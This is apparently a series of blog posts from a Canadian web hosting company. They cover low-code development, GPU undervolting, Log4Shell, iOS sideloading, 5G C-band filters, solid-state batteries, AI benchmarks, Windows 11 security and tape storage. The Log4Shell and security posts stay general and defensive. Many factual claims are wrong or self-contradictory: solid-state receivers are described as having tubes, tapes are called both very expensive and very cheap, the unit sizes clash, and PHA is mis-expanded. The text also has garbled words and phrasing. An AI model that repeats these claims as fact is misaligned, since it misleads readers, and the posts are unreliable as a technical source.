Slowing the Low Code Hype Train

Here we are with another new calendar year opened up, and you’ll be forgiven if January ’22 has you the same you were at this time last year with some sense of bewilderment at how developer technologies and methodologies are expanding in leaps and bounds. Part of that has been low-code technology, one that was forecast to have gains in application around 22% for 2021 and by all indications did that at the very least. It’s also estimated that by 2025 70% of new applications will be built with low-code or no-code technologies.

What we have on the plate today is 3rd generation low-code technology that’s improved on the 2 preceding generations of it. It gives enterprise that ability to build anything from the simplest to highest complexity applications and scaling them to whatever extent needed without limitations. It’s also known for providing built-in controls and functionalities required for enterprise governance while fostering more collaborative team working environments too.

It is conducive to the type of digital applications enterprises need to be able to create quickly and then easily adaptable as they fit needs that may be changing. Here at 4GoodHosting we imagine we’re like any good Canadian web hosting provider in that we’re able to see the real relevance in that and accordingly why there’s so much hype about low code and applications that are built around it.

But perhaps there’s reason to pull on the reins a bit there

The Pros

Low code can be helpful for building an MVP and fleshing out concepts within a small scope with precise product requirements and an understanding any scaling will be limited. But many times as project progresses there is the need to upgrade the processes. Without low-code solutions your ability to scale is very limited, and it can also be more costly too.

Then from the developer’s perspective choosing low code to complete small-scale projects and prototypes or build basic solutions is almost always faster and with fewer hiccups. Keep in mind though that most professionals will prefer to code from scratch when working on complex on account of the flexibility that provides for them. While the chance that a low-code platform won’t allow you to create a product meeting new or changed requirements will exist, that’s usually no deterrent.

Scalability really is the key benefit for low-code development, and the opportunity for and cost of horizontal and vertical scalability are primary factors when a vendor is being chosen. The benefits for accommodating changing numbers of daily active users, available features, storage, and expanded computing power are considerable and weight heavily in favour of this type of development.

It also allows you to escape being overruled by AI when a site experiences a large of influx of visitors and you would otherwise have access limited and / or forced to upgrade. This a huge issue in the SaaS sector right now and it’s one that’s pushing developers there to have greater interest in going low-code moving forward.

The Cons

Starting at the start here with the drawbacks to building with low code, it is extensive training requirements. There’s usually a lot that goes into implementing a low-code solution and how that usually manifests itself is in significant delays in deployment. For many people the foreseeing of this is what leads them to stick with agile development in order to get to market in a timeframe that’s been envisioned for the product.

The next issue here is timeframe variances related to other factors aside from development tools and methodologies. Ones that vary from weeks to months and will depend on the quality of the available documentation and support. The fact there isn’t an industry standard means every platform will have its own unique system. If an industry standard did exist that would change things instantly, but of course the question who would define that, based on what criteria, and what authority to do so?

Troubleshooting is difficult with low-code development too. When something goes wrong it a successful remediation will depend on the quality of the documentation, the response speed, and the competence of the dev team and their support. Debugging a program built with low-code may be difficult or flat-out impossible too, and vendor lock-in is a possible negative too if the solution will not be compatible with any other competitor or similar provider.

You may need to depend on the vendor’s platform to work, and you may only be able to make use of it as a backup. Plus migrating to another service is many times nearly impossible. You may well have to start over again from scratch.

One Tool Like Others

The simplicity and scalability of low code make it appealing, but it shouldn’t be seen as the be-all solution that should be rolled out by default in every task instance. Make sure you have a deep understanding of the niche you’re working in to foster strong understanding of the demands for the product you’re building and how they might be tested against a vendor’s capabilities.

Pros & Cons for Undervolting Graphics Cards

Hoping that everyone is enjoying the holidays, had a good Christmas, and has an enjoyable NYE 2022 on deck. During the Xmas holidays a lot of people find time for entertaining themselves that’s not as easily found during the rest of the year. For some people that entertaining is best done via their computer, and for many there’s nothing better than enjoying games. They’ve come a long way over the last decade +, and usually in order to get all the visual pop and immersive experience the game developers want you to have you need a good GPU.

Lots of people are perfectly fine with the one that came in their desktop, and not many of them will be the type inclined to perform invasive surgery on computing devices in the first place. For others with the know how and no hesitation to perform ‘tweaks’ it is possible to make small changes to computer components that will alter how they function. One of these procedures that gamers will probably at least have heard of is undervolting the GPU. To describe in plainly, it means to restrict the power that the card has access too and gain specific performance benefits because of it.

This is not something that would generally be among the familiarities for a Canadian web hosting provider, but here at 4GoodHosting we are good at identifying what might be of interest for people who are tech-savvy in this way, and it turns out that undervolting isn’t especially difficult to do. So it’s something that might be possible for you if you’re an avid gamer, and what we’ll do here with the last entry for 2021 is talk about advantages and disadvantages to undervolting graphics cards.

Efficiency Boost

Your GPU is going to have a few important calibrations that are open to manual adjustment with software like MSI Afterburner. These include power limit, core and memory clocks, plus the voltage. The entirety work in unison to provide the performance and power needed for what’s expected in regard to out-of-box operation.

So what exactly is undervolting? Simply, it is a reduction of the voltage your GPU has access to and the primary aim is to maintain the performance associated with stock settings while at the same time boosting efficiency. Undervolting takes specific aim at power draw and heat as areas where improvements can be made.

The first question is this then; if a GPU is able to run better at a lower voltage, why wouldn’t the manufacturer build them with this in mind? The answer is that silicon can vary with each individual GPU and some will tolerate different voltages and clocks better than others. Standard settings will be aligned with whatever is known to be the average tolerance.

The most noticeable differences will be with a GPU that’s built to be power hungry, and the Nvidia RTX 30-series Founders Edition is one of them. Undervolting this card may offer many improvements, especially in challenging applications. A lower-power GPU will put out less heat so you’ll have less to gain undervolting a GPU card like this.

Pros / Cons for Undervolting

We should start by saying that most of the time it will actually be best to leave your GPU at stock settings. Some users will also choose to use an automatic overclocking tool as a cost-effective and simply implemented tool for regulating graphics card performance.

Pro 1: Lower power consumption will promote lower heat. This means a reduced power bill, even if it’s not much lower. Less heat can also equate to better thermal performance for your other surrounding components like the CPU. Modern GPUs tend to come with plenty of power, so undervolting can be very beneficial for mitigating the effects on your PC ecosystem. Plus your power supply will be less stressed.

Con 1: You’ll need to spend time familiarizing yourself with settings on the GPU. While undervolting is not especially difficult, it does require some knowledge and ability to tinker around effectively and neglecting that may mean you do permanent damage to the GPU.

Pro 2: Familiar software like MSI Afterburner makes it free to do, and generally it’s not too risky. Keep in mind as well that undervolting may also help prolong the life of your GPU because it will be under less thermal stress over time.

Con 2: Further tinkering may be required in the future. New driver updates or changing ambient temperatures are two of the reasons you may sometimes have to go in and adjust your settings for optimal performance.

Pro 3: Undervolting is ideal when you’re fitting a powerful GPU into a small form factor enclosure, because it makes it a much better experience. Small cases are usually more restrictive for heat dissipation, so you’ll enjoy better thermals in these smaller spaces while performance isn’t compromised like it might be with a CPU that hasn’t been undervolted.

Con 3: You may end up applying incorrect settings without being aware of it, and poor performance results. If insufficient voltage to the GPU occurs or it isn’t properly applied there may be overall instability and reduced frame rates. Double checking and testing your GPU performance to insure it’s improving with voltage changes is always a good idea.

Pro 4: Less noise. The lower voltage will make it so that the GPU fans can spin at lower RPMs with the accompanying reduced heat. This also means less power is needed for the fans, and that keeps the entire system performing at a lower noise level.

Rent Out Computing Power for Access to Apps and Services

There’s the old expression ‘take only what you need’ and it’s good advice to follow in all sorts of situations. It may be followable when you’re at an all-you-can-eat buffet and you’ve eaten all you can, but when it comes the processing power in your computers at home you get what’s given to you when the device was put together. Some people put the entirety of that processing power to work for them, but most people don’t use anywhere near the total of it. And in truth the majority of people may not even know what it is they actually have at their disposal.

Some will though, and it’s these people who will want to take note of a new decentralized Internet platform that will let people pay for their apps and services by making their idle computing power available to those who could put it to use. As a quality Canadian web hosting provider, this is something that resonates with us here at 4GoodHosting because like any host we can relate to what it’s like to have real constraints based around this and in the industry there’s been much in the way of roundabout talk along the lines if something like this might become possible someday.

It has made a lot of sense for a long time, but like many things it takes time to get the wheels sufficiently in motion to see things start to happen. But that’s what’s happening now with Massive, an app monetization startup that’s set to make some serious waves.

Smart Decentralization

Massive has just recently closed a $11 million seed round, which will let it move forward with a monetization software development kit that will be able to support the project and move forward with s small yet noteworthy step in decentralizing the internet and making it possible for people to pay for apps using their idle compute power.

This is an impressively unique potential solution, one that will benefit the individual consumer but also improve on how app developers and service providers make money for the work they do. As it is now they usually charge users money, and it’s fairly standard to have a 1-time app download fee or subscription services that come with a monthly charge. There are some who want to make their work free to the public and will set up their compensation by means of an implementing on-screen ads, and nearly everyone will know the type from using the apps they have.

This is especially common for mobile games and sometimes it is preferable because upfront costs often turn off new customers. But ideally most people will enjoy an ad-free experience, and that may be what’s soon to be possible if people have the means of renting out their CPU power.

Expanding on Distributed Computing

What is being proposed here is taking the concept of distributed computing – utilizing extra CPU cycles on otherwise idle machines- and reinventing it as a legitimate payment method. Looking at how it works it is not unlike to individuals can rent their unused vehicles and homes on Turo and Airbnb. The unused compute power is exchanged for a passive means of paying for apps and services already being used and enjoyed.

Some might say this will sound a little invasive because the space and power is going to be utilized on a personal device, and it may be for those who aren’t familiar with distributed computing. However, Massive is adamant that it will be putting a priority on security and digital consent, with promises on their website that users will need to opt into the model to participate plus able to opt out at any time.

They’re also very upfront about their wish to be a part of dismantling the internet’s reliance on nosy marketing practices. The idea is that this new arrangement opportunity will reduce the amount of personal information users unwittingly give away, and it is true that antivirus protections are going to be thoroughly incorporated into Massive’s CPU-sharing software.

They are working with third-party partners to this model to customers, but as of now Massive is only compatible with desktop apps. Plans are in the works to bring this opportunity to Mobile, although that may be a good ways down the road. Currently more than 50,000 computer users have already opted in, and that’s a very strong reflection of the high level of interest there’s going to be from people who like the idea of ‘bartering’ in a way for their apps and services.

New Log4Shell Open-Source Apache Software Vulnerability a Major Problem

It has certainly been a while since we’ve had a nasty bug making enough of a stink that it warrants being the subject of one of our weekly blog posts, but here we are again. The good thing has always been that these software vulnerabilities are usually quite limited in the scope of what they’re capable of, and that means they usually don’t get much fanfare and they’re also usually fairly easily dealt with via patches and the like.

The problem becomes when the bug is rooting in software that is ubiquitous as far as being used in cloud serves and enterprise software used as much for government as it is in industry. That’s the scenario with the new Log4Shell Software Vulnerability that has the Internet ‘On Fire’ according to those who are qualified to determine whether something is on fire or not. All joking aside, this is apparently a critical vulnerability in a widely used software tool, and – interestingly enough – one that was quickly exploited in Minecraft.

But now it emerging as a serious threat to organizations around the world, and here at 4GoodHosting like most quality Canadian web hosting providers we like to keep our people in the know when it comes to anything that’s so far-reaching it might apply to a good number of them.

Quick to be Weaponized

Cybersecurity firm Crowdstrike is as good as any for staying well on top of these things, and reading what they have to say about Log4Shell is that within 12 hours of the bug announcing itself it’s been fully weaponized. That means that tools have been developed and distributed for the purpose of exploiting it. Apparently all sorts of people are scrambling to patch, but just as many are scrambling to exploit.

It’s believed this software flaw may be the worst computer vulnerability to come along in years. As hinted at, it was discovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. If allowed to continue unchecked it has the potential to enable criminals, spies, pimps and programming novices alike for no-hassle access to internal networks.

Once in they can loot valuable data, place malware, wipe out crucial information or do a whole lot of other types of damage. And it seems to be that many different kinds of companies could be at risk because their servers have this utility installed in them and we’re still in the early stages of fallout with this.

Cybersecurity firm Tenable goes one step further in describing it as ‘the single biggest, most critical vulnerability of the last decade’ and maybe even the biggest one in the history of modern computing.

10 / 10 Cause for Alarm

We also have Log4Shell being given a 10 on a scale of 1 to 10 for cause for alarm the Apache Software Foundation, which oversees development of the software. The problem is that anyone with the exploit can obtain full access to an unpatched computer that uses the software, and specifically said the extreme ease the attacker has with accessing a web server through the viability and without a password is what makes it such a major threat.

A computer emergency response team in New Zealand was the first to report of the flaw being actively exploited in the wild just hours after the first patch was released in response to it. This was weeks ago now, and the hugely popular online game Minecraft was where the first obvious signs of the flaw’s exploitation were seen, and the fact the game is owned by Microsoft shouldn’t be overlooked.

It’s been reported at the same time that Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box. Apparently a software update form game users followed shortly after and customers who apply the fix are protected. But the ‘fire’ isn’t contained by any means – researchers reported finding evidence the vulnerability may also be exploited in servers operated by companies like Apple, Amazon, Twitter and Cloudflare.

The Case Against Sideloading Apps onto iOS

Android and iOS are definitely two entirely different worlds when it comes to the default choices between mobile devices, and you’d have trouble finding any more than just a few people who don’t take advantage of apps for their smartphones nowadays. Depending on who you are that may be for entertainment or personal pursuit aims, or it may be for making your workdays that much more productive and streamlined. All sorts of possibilities out there for what you can do with apps and it sure is a whole lot different from where we were just 10 or so years ago.

Once you’ve got a taste for them it’s hard to go back, and you won’t want to be thwarted in your attempts to get one into your device if you see the need for it. The reason that sideloading apps – installing apps without getting them from office

ial sources (namely Android Market or the App Store) – is as popular as it is because both Google and Apple have been fairly free with allowing certain carriers to block certain applications based on model and network. There’s plenty of people with phone only a couple years of old that are already encountering roadblocks, and sideloading the app allows them to get around that.

In the bigger picture though it’s not good for the development of better app versions in the future, as those developers don’t get what they should for their work and that’s something we can relate to in a roundabout way as a good Canadian web hosting provider. We certainly know all that goes into allowing people to enjoy the digital connectivity they do nowadays.

So not to pick sides, but recent information seems to suggest that sideloading apps for Android is not so bad as it might be for iOS devices. Let’s look at why that is.

Privacy & Security Concerns

Apple has come right out and made it clear that there’s plenty of evidence indicating sideloading apps through direct downloads and 3rd-party app stores would weaken privacy and security protections that have made their iPhone as secure as it’s been regarded to be all these years. They’ve even sent a letter to US lawmakers raising similar concerns about legislation that would require app store competition and mandate support for sideloading.

The focus here is more on sideloading apps installed by users on a device without the involvement of a trusted intermediary performing oversight function, at least to some extent. It is true that downloading an iOS app from a website and installing it isn’t the same as downloading one from an app store operated by Google or Microsoft. Whether a 3rd-party app store might offer better security and privacy than the official app stores is a legitimate question.

A lot of the concerns will be based around the fact that Apple only spends an average of 12 minutes or so reviewing each iOS app. Apps offered elsewhere than the iOS app store may be backed by a more detailed app review, and better for disallowing all third-party analytics and ad SDKs. Long story short apps that cost more elsewhere might be worth it after all, but generally you’re not going to find any versions of such being available for sideloading anyways.

Android Difference

A part of why Apple disapproves of the sideloading is in user interests as it believes that Android has poor security because it supports sideloading. It is true that a survey found that Android devices have 15 to 47 times more malware infections than iPhone, so there is some truth to this although the size of user base has to be taken into consideration too.

To be fair though Apple does not put out a Transparency Report the way Google does for Android. Security issues may be more visible on Android than iOS, but that is a reality of iOS being less accessible to researchers. According to the most recent version of that report, only about 0.075% of current Android devices running 11 during 2021 Q2 had a PHA (partially harmful application), and that would include devices that sideloaded apps.

It does need to be said though that security issues on Android are a reflection of Google’s inability to force operating system upgrades on devices sold by other vendors. As a results older Android versions with vulnerabilities hang around the market longer. That’s a consequence of Android’s multi-vendor ecosystem rather than the perils of sideloading.

The Case

  • The risks that a person could assume if they sideload apps onto an iOS device:
  • Greater numbers of harmful apps reaching users due to the ease for cybercriminals to target them this way, and especially including sideloads limited to 3rd-party app stores.
  • Users having less up-front information about the apps to make informed decisions about whether or not to add them to the device, and less control with those apps once they’re on the devices.
  • Protections against third-party access to proprietary hardware elements may be removed, and non-public operating system functions may be distorted or misaligned.
  • Sideloaded apps needed for work or school may have put users at a direct disadvantage

Other Considerations

Another thing to keep in mind is that sideloading does increase the attack surface in iOS at least to some extent, although to be fair the App Store has had more than a few scam-geared and insecure apps themselves over the years. The security afforded by iOS is a legit benefit, largely due to security features built into the operating system, like app sandboxing, memory safety, permission prompts, and others.

It is also always advisable to look for reviews of the app that have been sideloaded in the same way you’re thinking of doing. External sites are often best for doing this as reviews for apps in 3rd party app sources may not be genuine ones, and the frequency of placed app reviews has been well established. Proceed with caution as with everything else.

New Exclusive C-Band Filters Set to Get 5G Past Federal Aviation Hurdles

The promise of what 5G will be capable of doing with regards to revolutionizing the digital world has the entirety of the planet clamouring for it to be rolled out in full as soon as possible. As is the case with any major game-changer though, there’s the potential for collateral damage if that’s not done in a calculated way. Putting airline passengers at risk because of signal interference related to 5G is exactly the type of risk that wouldn’t be acceptable, and that’s why earlier this month Canada’s Department of Innovation, Science, and Economic Development (ISED) introduced restrictions on certain 5G services in and around airports.

This is because they would interfere with radio altimeters, which are a very important component of aircraft navigation systems that tell pilots where their planes are relative to Earth. Everyone gets the importance of safety in this regard, but that isn’t going to do much to quell the displeasure for those with a 5G-enabled device who finds themselves in a bind due to something work related in the departure lounge before flying out. Or any other of many different possible scenarios.

Here at 4GoodHosting we’re like any other quality Canadian web hosting provider in that we’re as keen as any to dive into what 5G is going to be capable of, and given that the majority of you who’d be reading this are likely to be tech savvy and forward looking in that way too we thought we’d share some positive news with this week’s entry – chip giant Qualcomm may already have a potential work around for this problem that may mean the ISED’s restrictions are going to be short lived.

Band Exclusivity is Key

What they have developed is a new set of filters called UltraBAW, which are capable of making sure sure C-band receivers and transmitters only work on the C-band. While it is true that such filters already exist, and that existing C-band devices and transmitters already have filters these new filters will have a sharper cut off for frequencies over 3GHz than existing ones. This means the guard bands won’t need to be as broad as there are now around transmissions at those frequencies.

Guard bands and filters have been at the heart of controversy regarding the risk to aviation safety for some time now. The aviation industry has taken the position that either airplanes’ altimeters will be confused by C-band transmissions or C-band towers leak out of their assigned bands to create a very real signal-crossing / signal misreading risks.

Co-existences + Better Filters, Better Hotspots

To date the majority of high-performance filter technologies have been focused on frequencies below 3GHz, as that is where most wireless action was located. Filtering between the 2.4GHz Wi-Fi band and the very nearby 2.3GHz WCS band has been critical to mobile device performance and that’s true for nearly every device and network, and even in crossovers between them.

The longstanding filter challenge for 5G is around 1-3GHz and with moving up into higher frequencies. The 5GHz Wi-Fi band has been made safe via public safety, radar and satellite systems just fine for many, many years but 5G assignments are hemming them in much more profoundly now and if left unchecked that was something that was going to be a big problem fairly soon.

Domestic Application Too

UltraBAW is going to come well into play with Home 5G Internet Too. It cuts a sharp line between the top of 5G frequency band N79 and the bottom of 5GHz Wi-Fi and it is possible the N79 band could be repurposed for civilian use in the future too. A better filter means you do not have to turn down the volume of your access points, avoid specific channels, or alternate between transmitting on different networks.

All of these things reduce data rates and signal range, and so this new filter for making 5G safe in and around airports is also likely to make its way into the everyday consumer market by means of being incorporated into modems, hubs, and the like. In fact it is expected that it will end up in hundreds of different kinds of products. For starters, it is expected that it will be integrated into Qualcomm’s next Snapdragon chipset, a name that anyone who is even remotely familiar with the workings of handheld mobile devices is almost certainly going to recognize right away.

Big Battery Advances Coming with Solid State

Safe to say audiophiles of today aren’t cut from the same cloth as those that came well before them, and it’s also true that there’s less of a focus on good and pure sound today than there was even a couple of decades ago. It is whf4at it is, and in fairness all of this has nothing to do with new technological advances related to the devices we love to use or need to use. Where we’re going with this is Solid State receivers – the ones with the tubes inside that would give off a light orange glow when lit with power – delivered clear, crisp, and authoritative sound in a way that lesser receivers couldn’t even come close to.

Solid State amplifiers have long been the preferred choice for professional musicians too for the exact same reason. They just sound a whole lot better, and it seems that all the power goodness that comes with Solid State electrical engineering is about to flip reality on its head once again with batteries for digital devices. Mass produced solid-state batteries are going to change everything, and we’re all going to be thrilled with it.

Any quality Canadian web hosting provider is going to be able to appreciate what it is to need big power, and look no further than the fact that most of the others will be just like us at 4GoodHosting in that we know what goes into powering massive data centres and the like. That’s macro scale stuff for sure, but there is plenty we already know about these solid-state batteries that are just around the corner and it is really promising stuff for sure.

Meeting CPU Needs

There is no getting around the fact that even the most power frugal processor is going to put serious demands on battery power. From phones to cars to cameras and beyond, battery power is usually going to be an issue and more of than not because there’s just not enough of it in 1 full charge. Lithium-ion batteries aren’t as safe as they need to be and producing them is nasty for the environment with all the rare earth minerals that have to be mined for them.

If we’re able to replace lithium-ion batteries and retire the technology, it really can’t happen soon enough. So here we are with big news about solid state batteries, starting with their utilization in electric vehicles. The solid-state battery industry for EVs is estimated to be worth $4.3 billion US by the end of 2027. Improving on the battery technology for these types of vehicles is important because we need to move past the internal combustion engine as soon as possible, for obvious reasons.

QuantumScape is a company who have apparently solved the issue of dendrite formation – when the battery is under load from fast charging. If you didn’t know there was a drawback to fast charging, now you do. Eliminating dendrite formation is a part of what will allow solid-state batteries to charge to 80% capacity within 15 minutes without degrading the structural integrity of the battery each time it’s charged.

Yes, this is why your iPhone battery gets progressively worse the longer you own the device. And yes, Apple’s been perfectly fine with that as part of the bigger picture of sneaky planned obsolescence which has had people buying new phones earlier than they’d like too for decades now. At least they are now making repair parts available. It’s a start.

Why Solid State is Better

Let’s get right to it – solid state batteries do not contain a volatile liquid component so their power density if much higher, it is also much, much safer. Plus, a solid-state battery will not catch fire like a Li-ion one might. That’s a huge plus in itself.

This increased energy density also means that the size of the batteries can be considerably smaller. The overcoming of dendrite formation makes solid state batteries capable of being charged many more times than a traditional Li-ion battery without any degradation. As we also touched on there’s not nearly the same environmental footprint to producing them too.

Specifically for smart devices:

  • Increased battery life and charge cycles
  • Devices will run much cooler
  • WAY fast charging without compromising the integrity of the battery

It may not be until around 2025 when we start to see this technology incorporated on a large scale with consumer devices, but it is coming and it’s going to be a fortunate turn of events.

AI Is Becoming Speedier

Artificial Intelligence has been a work long in progress, but in recent years we are definitely starting to see it begin to make more of a mark. The capacities of it were never in question, but the speed with which those capacities could be undertaken were sometimes. Not that performance speeds are always necessary with AI-related tasks, but sometimes their speediness is definitely of the essence. For example AI is earmarked for an extensive role in healthcare in the future and that’s one area where both accuracy and quick results are definitely going to be required.

Recent AI performance testing results came out over a little more than a month back, and what they’ve shown is that AI is getting faster, and that’s something that is great news for the increasingly digital modern world. The future of it is something that is of great interest to us here at 4GoodHosting, and in the same way it would be for any Canadian web hosting provider who enjoys having an eye on the future and what it will entail for IT and all that grows along with it.

This measuring of general AI performance follows the first official set of benchmarks much earlier and lays out 350 measurements of energy efficiency. Most systems measured improved by between 5-30% from previous testing, and some were more than 2x better than their previous performance stats.

So what is the significance of this, and what will it mean in relation to development? That’s what we’ll look at here this week.

6-Way Performance Testing

This testing involved systems made up of combinations of CPUs and GPUs or other accelerator chips being tested on six different neural networks and performing an array of common functions—image classification, speech recognition, object detection, 3D medical imaging, processing of natural language, and ability to make logical recommendation. Computers meant to work onsite instead of in the data center had their measurements made in the offline state to recreate their receiving a single stream of data to measure against least ideal pathway instances.

When it comes to AI accelerator chips used in the tested machines, most notable were software improvements to them that were promoting an up to 50% improvement in performance. Typically this was for 1 or 2 CPUs plus as many as 8 accelerators. Of all the ones tested, the Nvidia A100 accelerator chips tested best and showed the most potential.

Multi-Instance GPUs Show Huge Promise

Nvidia has also created a splash with a new software technique called multi-instance GPU (MiG), which allows a single GPU to assume the roles of seven separate chips from the point of view of software. Tests that had all six benchmarks running simultaneously plus an extra instance of object detection came back with solid results that were 95% of the single-instance value.

It should be noted here thought that supercomputer testing doesn’t usually lend itself to conventional result categorizing, and the only part of them that really does is efficiency testing. Testing that is based on inferences per second per watt for the offline component. There is much that was revealed regarding the tests based on this metric, but what’s probably more valuable here is to make light of the new industry benchmark for this performance, which is the new TCPx-AI benchmark and based on:

  • Ability to generate and process large volumes of data
  • Training pre-processed data to produce realistic machine learning models
  • Accuracy with conducting insights for real-world scenarios based on generated models
  • Scalability for large, distributed configurations
  • Level of flexibility for configuration changes to meet changing AI landscape demands

Accurate Data, On the Fly

The new TPCx-AI puts the priority on real, genuine, and accurate data that can be reliably generated on the fly. It seems very likely that this new benchmark will be quickly adopted as the gauge by which AI processing speeds and the data produced are evaluated. Having this data generated upon request and with some speediness in getting that data is going to be huge pretty much right across the board.

Deep learning neural networks and GPU hardware are going to play a big role in all of this too, and natural language processing is going to be a must too if AI is going to be convertible in the way it needs to be serve people in other parts of the world too. There’s reason for optimism these days here too, as an exponentially increasing number of highly accurate captions have been written purely by AI. They’re generated in milliseconds and delivered directly to customers without domain involvement.

All of this has dramatically increased the speed, quality, and scalability of alert captions – the exact type of data language that is most important much of the time when it comes to applications for artificial intelligence in improving the quality of life for people in the future.

Improving on Windows 11 Threat Protection

There’s always been two tribes when it comes to computing device preferences, and you’re either a Mac or a PC. Those who prefer Macs will usually have a long list of reasons why they prefer to them, and some will point out their perception of more solidity when it comes to defending against web-based threats. They’re ones you are not going to be able to steer clear of if you’re accessing the web, and that’s why robust virus threat protection and other types of protection are super important no matter when type of device you’re using.

Whether Macs are more secure than PCs certainly hasn’t been proven definitively, and people who prefer PCs will have their own long list of reasons as to why they prefer them. Neither type is completely impervious to threats of these sorts, but recently a lot has been made about the shortcomings of Windows 11 when it comes to device security. Here at 4GoodHosting we are definitely attuned to how this is a top priority for a lot of people, and like any other Canadian web hosting provider we can relate to how it’s not something your brush aside if operating your business means collecting and retaining sensitive data.

Which leads us to the good news we’re choosing to dedicate this week’s entry to – there are ways that users can improve threat protection for Windows 11 devices and they are not overly challenging, even for people who aren’t the most tech savvy.

Minimal Protection Built In

Windows 11 is an upgrade on its predecessor when it comes to devices security, and particularly with TPM and Secure Boot plus the guarantee of future security updates that come with them. The problems is that TPM and Secure boot only protect against two types of threats, and the effectiveness of it is entirely related to hardware configuration. If detection can’t be done based on the signature of the BIOS drivers and their relation to the OS then you’re out of luck when it comes to threat detections.

So here are the threats, and what you can do to improve security on a Windows 11 device to defend against each of them more effectively:

  1. Social Engineering

Actions taken on your PC determine your level of risk. Clicking on links, downloading files, installing programs or plugging in external USB drives without using caution and judgment isn’t wise. Doing so can create the problems that security hardware and software try to shield you from. And just because you received it from a trusted source doesn’t mean the link, program, or drive itself is to be trusted.

The same can be said for making personal information available, like your birth date, location, phone number, social security number, and so on. This is because it can be used to gain unauthorized access. And many times when something does occur the biggest part of the headaches is in how that access is to your linked Microsoft account and other services. You should also be sure to not store certain kinds of sensitive information in a non-encrypted file (e.g., Word doc) or share it via non-encrypted forms of communication – email or text message.

  1. Viruses and malware

Malware can be a major source of problems for devices run on Windows 11, and the truth here is that the best defense against those threats is to be careful with your daily routine. But you will still need quality antivirus software for Windows 11, and Windows Security is functional enough as Microsoft’s packaged solution coming with the operating system. For basic internet security it’s fine, but for anyone who’s usage needs or inclinations have them more exposed to threats it is just not sufficient enough.

Choosing to install 3rd-party software is an option, but you may not need to assume that expense. Some people choose to augment Windows Security with a more malware-specific program that provides a little more protection. Don’t go overboard with layering them though, as they can end up conflicting with each other and being less effective as a result.

  1. Open Incoming Ports

With Windows 11 the user will need to keep access to incoming ports blocked in order to prevent being exploited through them. But going with no firewall on your PC is the same as leaving a house with all of its doors not only unlocked, but actually wide open. When incoming ports are left completely exposed anyone on the internet can then attempt to exploit services on your computer available through those ports. When that happens successfully, you’re going too have problems.

The firewall will close them up and many home routers have a built-in hardware firewall. However, you can’t fully rely on them and individual device protection is needed to go along with network-oriented protection. Windows 11 provides sufficient built-in firewall protection, but you need to make sure it is turned on in the Windows Security app.

  1. Data Leaks

It is actually impossible to entirely stop data from being leaked onto the web, and the reality is breaches and leaks are an unavoidable part of life. Windows 11 may have an acceptable level of security, but if the password you have for your linked Microsoft account is the same one used for other services then the basic protections that come with the OS aren’t going to save you from unauthorized account access.

Piece of advice #1 here is not to reuse passwords. And when creating them you should come up with a strong, random, and unique password for every service and website used, plus immediately changing your password for any location where there’s been a breach or leak. Password managers are a good choice – they can keep track of all of those random character strings in a way that’s safe and you don’t need to remember them individually.

Two-factor authentication is also good for beefing up defenses against data leaks. It may be the second step to the login process is what ends up thwarting attempts to access your account. The most secure method is a hardware dongle, but most of you will determine using a mobile app that generates a code provides an ideal balance between security and convenience.

  1. Spying on your Internet Traffic

Every network will have the data being requested and sent to individual devices on display if the individual knows where to look (packet sniffing). When a network is more open it is easier for this to happen. Public Wi-Fi networks are the worst for this risk, and particularly when data in not encrypted. In that scenario the exact information you’re transmitting may be visible too and that can be a big problem obviously.

If data being transmitted is sensitive, then a VPN is the best choice. It will create a secure tunnel that your traffic is funneled through. Use a VPN on your devices when on public Wi-Fi networks and you’ll be MUCH better protected.

Continuing Merits of Tape Storage for Petabyte Data

Obsolescence is real, and it’s an unavoidable reality for nearly all type of technology eventually. Even what is especially practical today will likely one day become useless, and as it has often been said ‘you can’t stop progress.’ When it comes to the digital world and the ever-greater demands we have for data storage, the way the Cloud has started physical storage down the road to obsolescence is definitely a good thing, and especially considering that physical data storage comes with a whole whack of costs that go profoundly beyond what it costs to lease the space.

The migration from tape storage to cloud has been underway for the better part of 2 decades now, and here at 4GoodHosting we are like any good Canadian web hosting provider in that we know all about the pros and cons of data storage means given the nature of what we do for our customers and the fact that we have 2 major data centers of our own in both Vancouver and Toronto. Cloud storage is the way of the future, and all things considered it 100% is a better choice for data storage.

The merits of tape storage for certain types of data continue to exist, however, and in particular it has a lot going for it when it comes to storing petabyte data. If you don’t know what that is, we can explain. You almost certainly know what a gigabyte is, and how there’s 1000 of them in a terabyte. Well, a petabyte is 1,024 terabytes. So needless to say we’re talking about a very large amount of data, but what is that makes tape storage preferable in some instances with this data? Is it just the sheer size of it that is the primary factor?

This is what we’ll look at with the week’s entry, and why the use of tape storage resists going entirely extinct.

Slow to Dwindle

Here in late 2021 only 4% still use tape as their only backup method, and all the while the use of cloud and online backups has gone up to 51%. It is estimated that 15% use a combination of disk and tape. It’s easy to list out what is inferior about tape storage; it is difficult and slow to eliminate completely due to the years of historic backups needing to be kept. Smaller businesses are the ones that can often get away from it freely and switch to a new method without much hassle.

For larger firms, however, and those with compliance requirements it is still quite common to need to retain tape storage. Many times this can be because of regulations pertaining to the operation of the business. Some companies don’t like what transferring costs and manpower required to manage two backup methods while older retentions expire is going to entail, and this has them sticking with tape storage too.

Cost considerations are definitely a big drawback to making a wholesale switch, and that’s because tapes can be very expensive. Let’s consider when cloud backup services were introduced how the high cost of disk storage and bandwidth made the service prohibitively expensive. With greater incorporation has come lower costs and that in turn has made cloud storage even more appealing.

Demand = Supply = Lower Costs


Another reason is that tapes are incredibly inexpensive. When cloud backup services were introduced, the high cost of disk storage and bandwidth made the service too expensive for most. As storage and bandwidth costs have plummeted, online or cloud backup has become increasingly accessible. Tape storage becoming more and more archaic and less and less in use means the cost of it hasn’t gone down at all.

Even if tape is still less expensive (and it is), the benefits of automation, control and reliability make cloud backups less pricey in the long run along with offering obvious peace of mind with knowing data isn’t stored in a physical data center that will have risk factors the cloud doesn’t. Smaller organizations that still have extensive data storage needs for multiple petabytes of data will find that the cost different difference between tape and the Cloud becomes quite significant.

Physical Air Gap

Another plus for tape backups is that they offer the benefit of being physically separate and offline from the systems being protected. In many ways this is kind of like reverting to an older, offline technology to thwart anyone with malicious plans who isn’t familiar with that technology. There are methods to logically ‘air-gap’ and separate cloud backups from your production environment, but they don’t have that reassuring nature that some people like when they’re able to have a tangible version of something.

All in all, though, the idea of relying on a degradable magnetic storage medium isn’t wise for most people and the primary reason they will want to upgrade to a more modern solutions is for automation and reliability. Keep in mind as well that tape backups are a very manual process. They need to be loaded, collected, and transported to off-site storage location for data storage.

Slow but Sure Shift

